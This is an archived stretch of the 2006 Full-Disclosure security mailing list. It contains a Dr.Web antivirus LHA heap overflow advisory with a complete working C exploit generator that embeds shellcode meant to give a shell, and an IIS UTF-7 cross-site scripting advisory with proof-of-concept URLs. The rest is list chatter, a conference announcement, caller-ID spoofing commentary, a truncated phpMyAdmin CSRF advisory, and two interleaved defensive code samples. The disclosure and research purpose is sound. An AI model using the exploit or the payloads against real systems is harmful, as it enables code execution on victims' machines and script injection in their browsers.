From jean-sebastien at guay-leroux.com Wed Oct 4 02:48:09 2006
From: jean-sebastien at guay-leroux.com (Jean-Sébastien Guay-Leroux)
Date: Tue, 03 Oct 2006 21:48:09 -0400
Subject: [Full-disclosure] Dr.Web 4.33 antivirus LHA long directory name heap overflow
Message-ID: <452312D9.5040107@guay-leroux.com>

Topic: Dr.Web 4.33 antivirus LHA long directory name heap overflow
Announced: 2006-09-19
Product: Dr.Web antivirus
Vendor: http://www.drweb.com/
Impact: Code execution
Affected product: Dr.Web 4.33, probably earlier versions also
Credits: Jean-Sébastien Guay-Leroux
CVE ID: CVE-2006-4438

I. BACKGROUND

Dr.Web, a new generation of a virus scanner, searches and kills file and boot viruses, as well as combination viruses, which infect both files and boot sectors. The SpIDer intercepts all attempts to access files and disk system areas and checks them for viruses "on-the-fly" first. Having detected a virus, SpIDer removes or locks it, granting access to the infected file only if it has been successfully cured. A highlight of Dr.Web that distinguishes it from other scanners is the heuristic analyzer along with the traditional mechanism for detecting viruses by signatures (a specific byte string in the virus code that definitely identifies the virus). Updates for new virus-extensions online via Internet.

Available for the following systems:
o Windows 9x, Me, XP, 2000, 2003
o LINUX
o FreeBSD, OpenBSD
o Solaris
o Novell
o OS/2

II. DESCRIPTION

When building a special LHA archive with a long directory name in an extended directory header, a fixed size buffer on the heap is overflowed. When processing this malicious archive, it is then possible to make Dr.Web run arbitrary code by overwriting some internal malloc management information.

III. IMPACT

Denial of service and possibly code execution.

IV. EXPLOIT

A working exploit version was developed for Dr.Web (R) Scanner for Linux v4.33 (4.33.0.09211). See appendix 1.

V. SOLUTION

The vendor did not provide any patch or workarounds for this security flaw. It is suggested to either change your antivirus software or to disable archive scanning until the vendor releases a patch. Disabling archive scanning greatly reduces DrWeb's power to detect viruses. To disable it, you need to modify drweb.ini and change the "CheckArchives" line to:

CheckArchives = No

VI. CREDITS

Vulnerability was discovered by Jean-Sébastien Guay-Leroux.

VII. TIMELINE

2006-04-xx : Bug is discovered (I don't remember when exactly :-)
2006-08-11 : Proof of concept code is written.
2006-08-25 : Vendor is notified via security at drweb.com and support at drweb.com.
2006-08-29 : Vendor says the bug was submitted to the developers for review.
2006-09-05 : Vendor is asked to provide an update on the bug.
2006-09-06 : Vendor says the request has been forwarded to the developers.
2006-09-11 : Vendor is asked, again, to provide an update on the bug.
2006-09-11 : Vendor replies with : "Sorry, no action yet."
2006-09-19 : Advisory is published.

VIII. APPENDIX 1

/********************************************************************
 stetoscope.c: Dr.Web 4.33 antivirus LHA directory name heap overflow for linux

 - Howto:
   Find a valid GOT entry to hijack with objdump -R /opt/drweb/drweb .
   I guess that you can use the address of free(), but my exploit uses
   the address of realpath(). There was a NULL byte in the GOT entry of
   free() so I had to find something else ;-)
   Calling the exploit will produce a file. Scan this file with a
   vulnerable version of drweb and you will, hopefully, get a shell :-)
   Good luck!

 - Exploit particularities:
   - There is a NOP sled using \xeb\x0a . Increases exploit reliability
   - 0xff and 0x00 are filtered characters
   - Bypass some malloc security checks added in malloc.c:
       Little security check which won't hurt performance: the allocator
       never wraps around at the end of the address space. Therefore we
       can exclude some size values which might appear here by accident
       or by "design" from some intruder.
     This thread helped me a lot :-) :
     http://archives.neohapsis.com/archives/dailydave/2006-q1/thread.html#149

 - Shellcode taken from Metasploit's shellcode generator.

 - Coded by: Jean-Sebastien Guay-Leroux
   http://www.guay-leroux.com
*********************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Base structure of a LHA file
#define I_HEADER_SIZE 0
#define I_HEADER_CHECKSUM 1
#define I_METHOD 2
#define I_PACKED_SIZE 7
#define I_ORIGINAL_SIZE 11
#define I_LAST_MODIFIED_STAMP 15
#define I_ATTRIBUTE 19
#define I_HEADER_LEVEL 20
#define I_NAME_LENGTH 21
#define I_NAME 22
#define I_CRC 26
#define I_EXTEND_TYPE 28

// Extended structure of a LHA file
#define E_HEADER_SIZE 0
#define E_HEADER_TYPE 2
#define E_HEADER_NAME 3

#define DEBUG 0

unsigned char shellcode1[] =
"\x33\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08"
"\x11\x22\xdf\x83\xeb\xfc\xe2\xf4\x62\x1a\x7a\x46\x5a\x77\x4a\xf2"
"\x6b\x98\xc5\xb7\x27\x62\x4a\xdf\x60\x3e\x40\xb6\x66\x98\xc1\x8d"
"\xe0\x19\x22\xdf\x08\x3e\x40\xb6\x66\x3e\x51\xb7\x08\x46\x71\x56"
"\xe9\xdc\xa2\xdf";

FILE * open_file (char *filename)
{
    FILE *fp;

    fp = fopen ( filename , "w" );
    if (!fp) {
        perror ("Can't open file");
        exit (-1);
    }
    return fp;
}

void put_byte (char *ptr, unsigned char data)
{
    *ptr = data;
}

void put_word (char *ptr, unsigned short data)
{
    put_byte (ptr, data);
    put_byte (ptr + 1, data >> 8);
}

void put_longword (char *ptr, unsigned long data)
{
    put_byte (ptr, data);
    put_byte (ptr + 1, data >> 8);
    put_byte (ptr + 2, data >> 16);
    put_byte (ptr + 3, data >> 24);
}

void usage (char *progname)
{
    printf ("\nTo use:\n");
    printf ("%s \n\n", progname);
    printf ("Example: %s 0x08080114 0x081C63F8 LHA_dir\n\n", progname);
    exit (-1);
}

int main (int argc, char *argv[])
{
    FILE *fp;
    char *hdr = (char *) malloc (4096), *ptr;
    int header_size;
    int written_bytes;
    int total_size;
    unsigned int retloc, retaddr;
    char *filename = (char *) malloc (256);
    int i;

    if (!hdr || !filename) {
        perror ("Error allocating memory");
        exit (-1);
    }

    if ( argc != 4) {
        usage ( argv[0] );
    }

    // parse arguments
    sscanf (argv[1], "0x%x", &retloc);
    sscanf (argv[2], "0x%x", &retaddr);
    strncpy (filename, argv[3], 255);
    filename[255] = '\0';

    memset (hdr, 0, 4096);

    // base header
    header_size = 29;
    put_byte (hdr + I_HEADER_SIZE, header_size);
    put_byte (hdr + I_HEADER_CHECKSUM, 83);
    memcpy (hdr + I_METHOD, "-lh0-", 5); // No compression...
    put_longword (hdr + I_PACKED_SIZE, 0x1234);
    put_longword (hdr + I_ORIGINAL_SIZE, 0x1234);
    put_longword (hdr + I_LAST_MODIFIED_STAMP, 0x1234);
    put_byte (hdr + I_ATTRIBUTE, 0x20);
    put_byte (hdr + I_HEADER_LEVEL, 0x01);
    put_byte (hdr + I_NAME_LENGTH, 0x04);
    put_longword (hdr + I_NAME, 0x90909090);
    put_word (hdr + I_CRC, 0x6666);
    put_byte (hdr + I_EXTEND_TYPE, 0x55); // Unix filesystem.

    // extended header
    put_word (hdr + header_size + E_HEADER_SIZE, 285);
    put_byte (hdr + header_size + E_HEADER_TYPE, 0x2);

    // Build our payload
    memset (hdr + header_size + E_HEADER_NAME, 0x41, 266);
    for (i = 0, ptr = hdr + header_size + E_HEADER_NAME; i < (240 - strlen (shellcode1) - 10);) {
        ptr[i++] = 0xeb;
        ptr[i++] = 0x0a;
    }
    for (; i < (240 - strlen (shellcode1));) {
        ptr[i++] = 0x90;
    }
    memcpy (hdr + header_size + E_HEADER_NAME + 240 - strlen (shellcode1), shellcode1, strlen (shellcode1));
    put_longword (hdr + header_size + E_HEADER_NAME + 266, 0x41414141);
    put_longword (hdr + header_size + E_HEADER_NAME + 270, 0xB7E34CC2);
    put_longword (hdr + header_size + E_HEADER_NAME + 274, retloc - 0xc);
    put_longword (hdr + header_size + E_HEADER_NAME + 278, retaddr);

    // Size of next extended header is 0
    put_word (hdr + header_size + E_HEADER_NAME + 282, 0x0000);

    total_size = (header_size + 284 + E_HEADER_NAME);

    fp = open_file (filename);
    if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) {
        if (DEBUG) printf ("%d bytes written\n", written_bytes);
    } else {
        perror ("Can't write to the file\n");
    }
    fclose (fp);

    return 0;
}

From jfeise at feise.com Sun Oct 1 00:12:12 2006
From: jfeise at feise.com (Joe Feise)
Date: Sat, 30 Sep 2006 16:12:12 -0700
Subject: [Full-disclosure] end of the interent ?
In-Reply-To: <8f1f7b60609291310m43c7742i58d36ca6552c6b8d@mail.gmail.com>
References: <8f1f7b60609291310m43c7742i58d36ca6552c6b8d@mail.gmail.com>
Message-ID: <451EF9CC.1060003@feise.com>

Peter Dawson wrote on 09/29/06 13:10:
> I had to share this wierd err
>
> http://www.google.com/reader/next?go=noitems

There are a bunch more of these kinds of pages. The first one I encountered, ca. 1998, was on opaldata.com (now defunct):
http://web.archive.org/web/19981202171631/http://opaldata.com/the_end/index.html

-Joe

From atoom.tonijn at gmail.com Sun Oct 1 01:33:13 2006
From: atoom.tonijn at gmail.com (マグロ原子)
Date: Sun, 1 Oct 2006 02:33:13 +0200
Subject: [Full-disclosure] Stealing Search Engine Queries with JavaScript
In-Reply-To: <631ac1d90609291417q7c5bdfc0o8c89c0b7067cd6ee@mail.gmail.com>
References: <631ac1d90609291417q7c5bdfc0o8c89c0b7067cd6ee@mail.gmail.com>
Message-ID: <6afa549f0609301733k55053c5ci1da6fa362e5a559f@mail.gmail.com>

Do a barrel roll.

Nyoro~n

-------------- next part --------------
A non-text attachment was scrubbed...
Name: cat-watch.jpg
Type: image/jpeg
Size: 64946 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061001/fe19ecb2/attachment.jpg

From atoom.tonijn at gmail.com Sun Oct 1 01:26:21 2006
From: atoom.tonijn at gmail.com (マグロ原子)
Date: Sun, 1 Oct 2006 02:26:21 +0200
Subject: [Full-disclosure] Stealing Search Engine Queries with JavaScript
In-Reply-To:
References: <91EBC35A21D8D041BB9496B76F9E747D11E708AF@mcbain.spidynamics.com>
Message-ID: <6afa549f0609301726u6eb63d8dxd761ab6e295eb86f@mail.gmail.com>

Doesn't work in Opera (9.02) or maybe I'm doing something wrong.
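The parser side of the LHA bug reported in the Dr.Web advisory above, as an added example from the editor (not the advisory's generator and not Dr.Web's code): it walks the same level-1 base header and extended-header chain that the generator emits, but checks every length read from the archive against the bytes present and against the destination buffer before copying, so a 282-byte directory name is rejected instead of overflowing. The header layout and the 282-byte figure come from the advisory; the 256-byte destination size, the function names and the constructed sample are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Offsets in a level-1 LHA base header, as in the advisory's generator. */
#define I_HEADER_LEVEL   20
#define I_NAME_LENGTH    21
#define I_NAME           22
#define EXT_TYPE_DIRNAME 0x02   /* extended header carrying the directory name */
#define DIRNAME_MAX      256    /* assumed fixed-size destination buffer */

enum lha_status {
    LHA_OK = 0,
    LHA_ERR_TRUNCATED,     /* a length field points past the available bytes */
    LHA_ERR_LEVEL,         /* not a level-1 header */
    LHA_ERR_EXT_TOO_LONG   /* directory name would not fit DIRNAME_MAX */
};

struct lha_entry {
    char   dirname[DIRNAME_MAX];
    size_t dirname_len;
};

static uint16_t get_word(const unsigned char *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static void put_word(unsigned char *p, uint16_t v) { p[0] = v & 0xff; p[1] = v >> 8; }

/* Walk the base header and the extended-header chain.  Each extended header
 * is a 1-byte type, its payload and the 2-byte size of the next header; the
 * size word in front of it counts all three.  Nothing is copied before the
 * length has been checked against the archive and the destination. */
enum lha_status lha_parse_level1(const unsigned char *buf, size_t len, struct lha_entry *out)
{
    size_t pos;
    memset(out, 0, sizeof *out);
    if (len < I_NAME)
        return LHA_ERR_TRUNCATED;
    if (buf[I_HEADER_LEVEL] != 1)
        return LHA_ERR_LEVEL;
    pos = I_NAME + buf[I_NAME_LENGTH] + 2 + 1;   /* name, CRC, OS id, then first size word */
    for (;;) {
        uint16_t ext_size; size_t data_len;
        if (pos + 2 > len)
            return LHA_ERR_TRUNCATED;
        ext_size = get_word(buf + pos);
        pos += 2;
        if (ext_size == 0)
            return LHA_OK;                    /* end of the chain */
        if (ext_size < 3 || ext_size > len - pos)
            return LHA_ERR_TRUNCATED;         /* would read past the archive */
        data_len = ext_size - 3;
        if (buf[pos] == EXT_TYPE_DIRNAME) {
            if (data_len >= DIRNAME_MAX)      /* the bound the advisory says was missing */
                return LHA_ERR_EXT_TOO_LONG;
            memcpy(out->dirname, buf + pos + 1, data_len);
            out->dirname[data_len] = '\0';
            out->dirname_len = data_len;
        }
        pos += ext_size - 2;                  /* land on the next size word */
    }
}

/* Constructed sample: level-1 header, 4-byte file name, one directory-name
 * extended header with dir_len bytes of 'd'.  Returns bytes written, 0 if
 * it does not fit in cap. */
size_t build_sample(unsigned char *buf, size_t cap, size_t dir_len)
{
    size_t base  = I_NAME + 4 + 2 + 1;        /* 29, as in the advisory */
    size_t total = base + 2 + 1 + dir_len + 2;
    if (total > cap || dir_len + 3 > 0xffff)
        return 0;
    memset(buf, 0, total);
    buf[0] = (unsigned char)base;             /* header size byte */
    buf[I_HEADER_LEVEL] = 1;
    buf[I_NAME_LENGTH]  = 4;
    memcpy(buf + I_NAME, "file", 4);
    buf[base - 1] = 0x55;                     /* extend type: Unix */
    put_word(buf + base, (uint16_t)(1 + dir_len + 2));
    buf[base + 2] = EXT_TYPE_DIRNAME;
    memset(buf + base + 3, 'd', dir_len);
    return total;                             /* trailing size word stays 0 */
}

/* Verdict for a dir_len-byte name, with the last `cut` bytes of the archive missing. */
enum lha_status check_sample(size_t dir_len, size_t cut)
{
    unsigned char buf[1024];
    struct lha_entry e;
    size_t n = build_sample(buf, sizeof buf, dir_len);
    if (n == 0 || cut > n)
        return LHA_ERR_TRUNCATED;
    return lha_parse_level1(buf, n - cut, &e);
}

int main(void)
{
    printf("20-byte name: %d, 282-byte name: %d, truncated: %d\n",
           (int)check_sample(20, 0), (int)check_sample(282, 0), (int)check_sample(20, 4));
    return 0;
}
```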
Nyoro~n

From tyoptyop at gmail.com Sun Oct 1 01:58:48 2006
From: tyoptyop at gmail.com (Tyop?)
Date: Sun, 1 Oct 2006 02:58:48 +0200
Subject: [Full-disclosure] Security Rss Feeds
In-Reply-To: <8f1f7b60609301405v354994fbu15e967e30ecd7244@mail.gmail.com>
References: <41011d980609300951r29d9058cga20091fb302fec47@mail.gmail.com> <8f1f7b60609301405v354994fbu15e967e30ecd7244@mail.gmail.com>
Message-ID: <985b1a3d0609301758p23b5e3c3he87bbe140e43d6f0@mail.gmail.com>

> http://portal.spidynamics.com/blogs/msutton/rss.aspx
> http://ha.ckers.org/blog/feed/
>
> < http://www.avertlabs.com/research/blog>
> < http://blogs.technet.com/msrc/default.aspx>
> < http://www.securityfocus.com/>

I add one more

News/
http://blogs.securiteam.com/index.php/feed/

Last Exploits on the wild/
http://www.metasploit.org/projects/Framework/updates/rss.html
http://www.milw0rm.com/rss.php

--
Tyop?

From ptrs-ejy at bp.iij4u.or.jp Sun Oct 1 05:00:37 2006
From: ptrs-ejy at bp.iij4u.or.jp (Eiji James Yoshida)
Date: Sun, 1 Oct 2006 13:00:37 +0900
Subject: [Full-disclosure] Microsoft Internet Information Services UTF-7 XSS Vulnerability [MS06-053]
Message-ID: <000101c6e50e$27137fd0$6401a8c0@Zarathustra>

+ Title:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Microsoft Internet Information Services UTF-7 XSS Vulnerability
[http://www.geocities.jp/ptrs_sec/advisory09e.html]

+ Date:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
1 October 2006

+ Author:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Eiji James Yoshida [ptrs-ejy at bp.iij4u.or.jp]

+ Risk:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Medium

+ Vulnerable:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Internet Information Services

+ Overview:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Using UTF-7 encoded URLs, IIS may return user specified content to the browser. If 'Encoding' is set to 'Auto Select', and Internet Explorer finds a UTF-7 string in the response's body, it will set the charset encoding to UTF-7 automatically, unless a certain charset encoding is already enforced.
+ Proof of concept:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://MaliciousSite/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''
http://MaliciousSite/+ADw-SCRIPT+AD4-alert('XSS');+ADw-+AC8-SCRIPT+AD4-.ida

UTF-7("<") = +ADw-, +ADx-, +ADy-, +ADz-
UTF-7(">") = +AD4-, +AD5-, +AD6-, +AD7-
UTF-7("/") = +AC8-, +AC9-

+ Patch:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Microsoft Security Bulletin MS06-053
Vulnerability in Indexing Service Could Allow Cross-Site Scripting (920685)
[http://www.microsoft.com/technet/security/bulletin/ms06-053.mspx]

+ Vendor status:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
IPA/ISEC was notified on the 27th December 2005.
Microsoft has released a patch for this vulnerability on the 12th September 2006.

+ Similar vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
XSS vulnerabilities in Google.com
[http://www.watchfire.com/securityzone/advisories/12-21-05.aspx]
Microsoft Security Bulletin (MS00-084)
Patch Available for 'Indexing Services Cross Site Scripting'
[http://www.microsoft.com/technet/security/bulletin/ms00-084.mspx]

-------------------------------------------------
Eiji James Yoshida
penetration technique research site
E-mail: ptrs-ejy at bp.iij4u.or.jp
URL: http://www.geocities.jp/ptrs_sec/index.htm
-------------------------------------------------

From wk at c4i.org Sun Oct 1 06:45:05 2006
From: wk at c4i.org (William Knowles)
Date: Sun, 1 Oct 2006 00:45:05 -0500 (CDT)
Subject: [Full-disclosure] Security Rss Feeds
Message-ID:

On September 30, 2006 10:21:51 PM +0530 men in black helicopters working for the Greys forced crazy frog crazy frog to write:

> Hi,
>
> Please share various security related rss feeds you read daily.
>
> Thanks,
> -CF

Save the trouble of looking at a number of security news feeds, let InfoSec News do all the heavy lifting for you!

http://www.infosecnews.org/

Cheers!
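A decoder for the UTF-7 shift sequences used in the IIS advisory above, added by the editor as a detection aid (it is not part of the advisory, of IIS, or of Internet Explorer): it turns a request path or log line back into what an auto-selecting browser would see, so markup that only appears after decoding can be counted, and it shows why the advisory can list +ADw- through +ADz- as spellings of one character (the leftover bits of a sequence are padding and are discarded). The proof-of-concept paths are the advisory's; the function names are assumptions.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Value of a character in the modified base64 alphabet UTF-7 uses, -1 if none. */
static int b64val(int c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/* Decode the UTF-7 shift sequences in an ASCII string such as a request
 * path.  Text outside "+...-" is copied through; inside, the base64 bits
 * are assembled into 16-bit code units.  Non-ASCII units become '?'.
 * Leftover bits at the end of a sequence are padding and are dropped,
 * which is why +ADw-, +ADx-, +ADy- and +ADz- all yield '<'.
 * Returns the length written to out (always NUL-terminated). */
size_t utf7_decode(const char *in, char *out, size_t cap)
{
    const char *p = in;
    size_t n = 0;
    unsigned long bits;
    int nbits, v;

    while (*p && n + 1 < cap) {
        if (*p != '+') { out[n++] = *p++; continue; }
        p++;                                              /* '+' opens a shift sequence */
        if (*p == '-') { out[n++] = '+'; p++; continue; } /* "+-" is a literal '+' */
        bits = 0; nbits = 0;
        while ((v = b64val((unsigned char)*p)) >= 0) {
            bits = (bits << 6) | (unsigned long)v;
            nbits += 6;
            p++;
            if (nbits >= 16) {
                unsigned unit = (unsigned)((bits >> (nbits - 16)) & 0xffffu);
                nbits -= 16;
                bits &= (1UL << nbits) - 1;
                if (n + 1 >= cap) break;
                out[n++] = unit < 0x80 ? (char)unit : '?';
            }
        }
        if (*p == '-') p++;                               /* optional explicit terminator */
    }
    out[n] = '\0';
    return n;
}

/* Decode a single sequence such as "+ADw-" and return its first character. */
char utf7_single(const char *seq)
{
    char buf[8];
    return utf7_decode(seq, buf, sizeof buf) ? buf[0] : 0;
}

/* Number of '<' and '>' present only after decoding: markup that a check on
 * the raw bytes would never have seen. */
int hidden_markup_count(const char *in)
{
    char buf[1024];
    int raw = 0, dec = 0;
    const char *p;
    utf7_decode(in, buf, sizeof buf);
    for (p = in;  *p; p++) if (*p == '<' || *p == '>') raw++;
    for (p = buf; *p; p++) if (*p == '<' || *p == '>') dec++;
    return dec - raw;
}

int main(void)
{
    /* The two proof-of-concept paths from the advisory. */
    const char *poc[] = {
        "/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''",
        "/+ADw-SCRIPT+AD4-alert('XSS');+ADw-+AC8-SCRIPT+AD4-.ida" };
    char out[256];
    int i;
    for (i = 0; i < 2; i++) {
        utf7_decode(poc[i], out, sizeof out);
        printf("%s\n  -> %s  (hidden markup chars: %d)\n", poc[i], out, hidden_markup_count(poc[i]));
    }
    return 0;
}
```

A response that declares its charset explicitly is not subject to Internet Explorer's auto-selection, so the decoder is for spotting attempts in paths and logs, not a substitute for the MS06-053 patch.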
William Knowles
wk at c4i.org

*==============================================================*
"Communications without intelligence is noise;
Intelligence without communications is irrelevant."
Gen Alfred. M. Gray, USMC
================================================================
C4I.org - Computer Security, & Intelligence - http://www.c4i.org
*==============================================================*

From bugtraq at cgisecurity.net Sun Oct 1 01:05:21 2006
From: bugtraq at cgisecurity.net (bugtraq at cgisecurity.net)
Date: Sat, 30 Sep 2006 20:05:21 -0400 (EDT)
Subject: [Full-disclosure] Security Rss Feeds
In-Reply-To: <8f1f7b60609301405v354994fbu15e967e30ecd7244@mail.gmail.com>
Message-ID: <20061001000521.23421.qmail@cgisecurity.net>

Add http://www.cgisecurity.com/index.rss as well ;p

-z

> Add two more to that list
>
> http://portal.spidynamics.com/blogs/msutton/rss.aspx
> http://ha.ckers.org/blog/feed/
>
> Paul, thanks for the new add's to me reader :)-

From securityproof at gmail.com Sun Oct 1 17:06:44 2006
From: securityproof at gmail.com (securityproof)
Date: Mon, 2 Oct 2006 01:06:44 +0900
Subject: [Full-disclosure] "POC 2006" by Korean hackers
Message-ID: <001701c6e573$9a4cec10$6819c4d3@FREE2>

The first international hacking & security conference by Korean hackers will be held on November 16 ~ 17. The conference is "POC 2006". POC means 'power of community'. We believe that the power of community can make the world safer.

"POC 2006" hates just theoretical discussion. "POC 2006" concentrates on technical and creative discussion and will show real hacking and security process.

There are two sections in "POC 2006". One is the 'Open Source' section.
Through this, new hacking and security tools will be introduced. The other is technical presentation, in which new hacking and security techniques will be opened to the world. You won't be disappointed at them. And you can have a chance to meet brilliant Korean hackers who are not well-known to the world.

The keynote speaker is Richard Stallman. He will speak on "Copyright vs Community in the Age of Computer Networks".

Technical section speakers and their topics are as follows:

* Jerry, "Virtualization Technique for the Security of Web and Application"
* Grugq, "VoIP Hacking: "
* Han Chang kyu, "The Way and Process to Analyze Polymorphic Virus"
* Ryan, "ActiveX Control and Web Application Security"
* Loafer, "The New Way to Protect from Runtime Format String Attacks through the Modifying of printf() functions Call Code"
* wooyaggo, "New Kernel Exploitation Technique on Linux 2.6.x"
* George Neville-Neil, "Network Protocol Security Testing with the Packet Construction"
* Xpl017Elz, "The New Ways to Attack Applications of Operating Systems under Execshield"
* Lukas Grunwald, "Attacking RFID Access-, Identify- and Ticketing- Cards"
* Secret, "Hacking the Automobile Electronic Control Unit"
* SunBing, "How to Implement a Virtual Machine Based Rootkit"

You can check the detailed information in "http://www.powerofcommunity.net".

All the speakers will publish Phrack style articles. If you register and visit our con, you can have a book which contains the detailed articles of the topics. The book will be given only on-site.

Kind Regards,
POC 2006
http://www.powerofcommunity.net

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061002/17f5a2ef/attachment.html

From sil at infiltrated.net Sun Oct 1 18:28:41 2006
From: sil at infiltrated.net (J. Oquendo)
Date: Sun, 1 Oct 2006 12:28:41 -0500
Subject: [Full-disclosure] Truths in "Truth in Caller ID Act"
Message-ID: <20061001172841.GB15007@infiltrated.net>

So the United States government wants to pass the "Truth in Caller ID" act. Humorously it will do little to deter criminals from spoofing their caller ID and scamming innocent victims. Here is the rule/law followed by why it will fail:

"It shall be unlawful for any person within the United States, in connection with any telecommunications service or VOIP service, to cause any caller identification service to transmit misleading or inaccurate caller identification information, with the intent to defraud or cause harm."

Re-read it a few times and let some common sense kick in.

"unlawful for any person within the United States, in connection with any telecommunications service or VOIP service, to cause any caller identification service to transmit misleading or inaccurate caller identification information"

What in this bill exactly deters someone from abroad from continuing their activities? Firstly they're not bound by U.S. laws, secondly if their servers are abroad those servers are in their lawful means to do what is legally appropriate for their location.

Now argumentatively how will the United States seek to prosecute say a telemarketer from using a service abroad to traverse back into the U.S.? Let's re-read the letter of the law again shall we? "unlawful for any person within the United States, etc., etc., to cause any caller identification, etc., etc."

So how does caller ID change, is it caused by the telemarketer, the server sending out the caller ID information, or the provider of that server. Obviously the telemarketer led the server to change the information, but ultimately the provider dished out the number, hence the provider being the true culprit.

The more I read about this law/rule/prohibition, the more I scratch my head at it.
So let's now see how the government intends on tracking someone shall we?

CallerIDBusterFoobar.com is a server located in Moscow. They're hosted there, their provider is there, their uplink is in Russia, etc. Joe Smith is a scumbag thief interested in stealing the credit card information of a "few good men". He lives in Boondock Arizona and spends much too much time thinking up scams. He signs up for an account at CallerIDBusterFoobar.com, assigns 800-DISCOVER as his caller ID and proceeds to scam countless people out of their information. With this information he sets up fraudulent drops and pickups somewhere in Moldova.

How will U.S. authorities track him down? They won't. They don't have access to the servers in Russia for starters, secondly how many people are reporting these crimes. Alright, let's be fair for a moment, someone at Discover "discovers" that the call actually originated from Russia. So what? Unless the foreign country is cooperating with U.S. authorities, there is little the United States government with all their so called legislation would be able to do.

Now let's take it a step further, Joe Smith decided to use Privoxy with a WiFi phone from an open network. He managed to steal a VoIP account while scanning a class A for port 5060 and leveraged someone's information. He has always used Tor and Privoxy on his personal distro of Linux on a CD so he knows that there will be no residue from his crimes due to him using this CD on this machine so he is scot-free technologically. How does the United States intend on stopping him again?

I get it now, since the United States government in all of their mighty wisdom is passing this bill it is only obvious that criminals are going to respect U.S. laws, I mean after all those in government follow their own laws so why shouldn't a criminal.

Comments, criticism?

--
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil infiltrated . net http://www.infiltrated.net

"How a man plays the game shows something of his character - how he loses shows all" - Mr. Luckey

From sil at infiltrated.net Sun Oct 1 19:41:56 2006
From: sil at infiltrated.net (J. Oquendo)
Date: Sun, 1 Oct 2006 13:41:56 -0500
Subject: [Full-disclosure] Truths in "Truth in Caller ID Act"
Message-ID: <20061001184156.GA15403@infiltrated.net>

Valdis.Kletnieks at vt.edu wrote:

> You mis-read the legalese.

> "It shall be unlawful for any person within the United States"

Define within the United States. The person, the server, the provider or all three. I don't believe it's misread, it's to the letter of the law. So again step by step...

"It shall be unlawful for any person within the United States, in connection with any telecommunications service or VOIP service..."

1) Telco/VoIP service is out of bounds here.
2) The User who initiated the command is logged from an address somewhere over the rainbow (Tor+Privoxy).
3) "within the United States" which? The person, or the telco/VoIP provider? Does it have to be both - person and provider. Sounds broad to me. Can't be single sided here.

So I decide to offer a service to say rape victims who want to remain anonymous, a victim decides to use "Jane Smith" <2035551212>, she is calling from say the British Virgin Islands where she was raped by a congressman. She doesn't want her identity known, but would like counseling over the phone.

1) She is in the British Virgin Islands so technically she is not breaking the law.
2) Me being the provider, I didn't initiate the spoof, I provided a service. Should I be held accountable for upholding the right to privacy?
3) Sure caller ID blocking could have been used, it still could be traced.

Let's take the case of someone blowing the whistle on government corruption. History has shown their life will be ruined.
This is a great avenue worry free to make a report yet at the same time if I decided to set my caller ID as that of the White House, I'm sure I can con a reporter to report something bogus. Dual edged sword.

What will be next, outlawing telco service unless it passes through DCS100 along with a photo and fingerprint at Fort Meade.

--
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil infiltrated . net http://www.infiltrated.net

"How a man plays the game shows something of his character - how he loses shows all" - Mr. Luckey

From sesser at hardened-php.net Sun Oct 1 18:59:18 2006
From: sesser at hardened-php.net (Stefan Esser)
Date: Sun, 1 Oct 2006 19:59:18 +0200
Subject: [Full-disclosure] Advisory 07/2006: phpMyAdmin Multiple CSRF Vulnerabilities
Message-ID: <20061001175918.GA4724@hardened-php.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                    Hardened-PHP Project
                    www.hardened-php.net

                  -= Security Advisory =-

     Advisory: phpMyAdmin Multiple CSRF Vulnerabilities
 Release Date: 2006/10/01
Last Modified: 2006/10/01
       Author: Stefan Esser [sesser at hardened-php.net]

  Application: phpMyAdmin <= 2.9.0
     Severity: Multiple vulnerabilities within phpMyAdmin allow bypassing its protection against CSRF
         Risk: Medium Critical
Vendor Status: Vendor has released an updated version
   References: http://www.hardened-php.net/advisory_072006.130.html

Overview:

   Quote from http://www.phpmyadmin.net
   "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields, manage privileges, export data into various formats and is available in 50 languages."

   During an audit of phpMyAdmin's protection against CSRF: Cross Site Request Forgeries we discovered that there were multiple ways to bypass the protection.
   The failure of phpMyAdmin's CSRF protection obviously means that a potential attacker can use CSRF attacks to trick the browser of a phpMyAdmin user to execute any kind of SQL queries on the victim's database server.

Details:

